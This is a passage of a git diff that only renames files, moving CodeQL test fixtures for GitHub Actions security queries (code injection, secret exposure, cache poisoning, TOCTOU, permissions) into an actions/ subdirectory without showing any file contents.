actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test6.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test7.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test7.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test7.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test7.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test8.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test8.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test8.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test8.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/untrusted_checkout1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/untrusted_checkout1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/untrusted_checkout1.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/untrusted_checkout1.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches1.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches1.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches2.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches2.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches3.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches3.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches3.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches3.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches4.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches4.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches4.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches4.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches5.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches5.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches5.yml rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches5.yml diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected rename to actions/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref rename to actions/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected rename to actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.qlref b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.qlref rename to actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.qlref diff --git a/ql/test/query-tests/Security/CWE-1395/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-1395/.github/workflows/test1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-1395/.github/workflows/test1.yml rename to actions/ql/test/query-tests/Security/CWE-1395/.github/workflows/test1.yml diff --git a/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected b/actions/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected rename to actions/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected diff --git a/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.qlref b/actions/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.qlref rename to actions/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.qlref diff --git a/ql/test/query-tests/Security/CWE-200/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-200/.github/workflows/test1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-200/.github/workflows/test1.yml rename to actions/ql/test/query-tests/Security/CWE-200/.github/workflows/test1.yml diff --git a/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected b/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected rename to actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected diff --git a/ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref b/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref rename to actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref diff --git a/ql/test/query-tests/Security/CWE-275/.github/workflows/perms1.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-275/.github/workflows/perms1.yml rename to actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms1.yml diff --git a/ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml rename to actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml diff --git a/ql/test/query-tests/Security/CWE-275/.github/workflows/perms3.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms3.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-275/.github/workflows/perms3.yml rename to actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms3.yml diff --git a/ql/test/query-tests/Security/CWE-275/.github/workflows/perms4.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms4.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-275/.github/workflows/perms4.yml rename to actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms4.yml diff --git a/ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml rename to actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml diff --git a/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected b/actions/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected rename to actions/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected diff --git a/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref b/actions/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref rename to actions/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref diff --git a/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml rename to actions/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml diff --git a/ql/test/query-tests/Security/CWE-284/.github/workflows/test2.yml b/actions/ql/test/query-tests/Security/CWE-284/.github/workflows/test2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-284/.github/workflows/test2.yml rename to actions/ql/test/query-tests/Security/CWE-284/.github/workflows/test2.yml diff --git a/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.expected b/actions/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.expected rename to actions/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.expected diff --git a/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref b/actions/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref rename to actions/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref diff --git a/ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml rename to actions/ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml diff --git a/ql/test/query-tests/Security/CWE-285/.github/workflows/test2.yml b/actions/ql/test/query-tests/Security/CWE-285/.github/workflows/test2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-285/.github/workflows/test2.yml rename to actions/ql/test/query-tests/Security/CWE-285/.github/workflows/test2.yml diff --git a/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.expected b/actions/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-285/ImproperAccessControl.expected rename to actions/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.expected diff --git a/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref b/actions/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref rename to actions/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref diff --git a/ql/test/query-tests/Security/CWE-312/.github/workflows/neg_test1.yml b/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/neg_test1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-312/.github/workflows/neg_test1.yml rename to actions/ql/test/query-tests/Security/CWE-312/.github/workflows/neg_test1.yml diff --git a/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml b/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml rename to actions/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml diff --git a/ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml rename to actions/ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml diff --git a/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.expected b/actions/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.expected rename to actions/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.expected diff --git a/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref b/actions/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref rename to actions/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref diff --git a/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected b/actions/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected rename to actions/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected diff --git a/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref b/actions/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref rename to actions/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref diff --git a/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.expected b/actions/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.expected rename to actions/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.expected diff --git a/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref b/actions/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref rename to actions/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection1.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection1.yml rename to actions/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection1.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection2.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection2.yml rename to actions/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection2.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache1.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache1.yml rename to actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache1.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache2.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache2.yml rename to actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache2.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache3.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache3.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache3.yml rename to actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache3.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache4.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache4.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache4.yml rename to actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache4.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache5.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache5.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache5.yml rename to actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache5.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml rename to actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_code_injection1.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_code_injection1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/neg_code_injection1.yml rename to actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_code_injection1.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache1.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache1.yml rename to actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache1.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache2.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache2.yml rename to actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache2.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache3.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache3.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache3.yml rename to actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache3.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache4.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache4.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache4.yml rename to actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache4.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache5.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache5.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache5.yml rename to actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache5.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step1.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step1.yml rename to actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step1.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step2.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step2.yml rename to actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step2.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step1.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step1.yml rename to actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step1.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step2.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step2.yml rename to actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step2.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml rename to actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml rename to actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml rename to actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected rename to actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref rename to actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected rename to actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref rename to actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected rename to actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref rename to actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/actor.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/actor.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-367/.github/workflows/actor.yml rename to actions/ql/test/query-tests/Security/CWE-367/.github/workflows/actor.yml diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml rename to actions/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment1.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-367/.github/workflows/deployment1.yml rename to actions/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment1.yml diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment2.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-367/.github/workflows/deployment2.yml rename to actions/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment2.yml diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/label.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/label.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-367/.github/workflows/label.yml rename to actions/ql/test/query-tests/Security/CWE-367/.github/workflows/label.yml diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/label_actor.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/label_actor.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-367/.github/workflows/label_actor.yml rename to actions/ql/test/query-tests/Security/CWE-367/.github/workflows/label_actor.yml diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml rename to actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-367/.github/workflows/test1.yml rename to actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test1.yml diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/test2.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-367/.github/workflows/test2.yml rename to actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test2.yml diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/test3.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test3.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-367/.github/workflows/test3.yml rename to actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test3.yml diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml rename to actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml rename to actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml rename to actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected rename to actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref rename to actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected rename to actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref rename to actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref diff --git a/ql/test/query-tests/Security/CWE-571/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-571/.github/workflows/test1.yml rename to actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test1.yml diff --git a/ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml b/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml rename to actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml diff --git a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.expected b/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.expected similarity index 